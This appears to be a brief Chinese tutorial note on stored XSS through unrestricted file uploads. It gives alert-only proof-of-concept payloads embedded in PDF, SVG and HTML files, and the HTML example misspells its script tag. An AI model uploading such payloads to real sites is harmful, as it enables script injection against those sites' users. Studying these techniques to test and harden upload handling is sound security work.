当后端文件上传没有限制PDF、HTML、SVG等后缀时可以使用文件上传获得存储型xss
相关文章:https://wooyun.js.org/drops/XSS%E5%A7%BF%E5%8A%BF%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0XSS.html
https://blog.csdn.net/weixin_39190897/article/details/113307664

PDF_XSS

使用迅捷pdf新建空白文档
image.png
image.png
输入:app.alert(‘XSS’);
image.png

SVG_XSS

svg 是一种图片格式
使用svg标签:
<svg xmlns="[http://www.w3.org/2000/svg"](http://www.w3.org/2000/svg") onload="alert(document.domain)"/>
image.png

HTML_XSS

  1. <HTML>
  2. <scrpit>alert(/xss/)</scrpit>
  3. </HTML>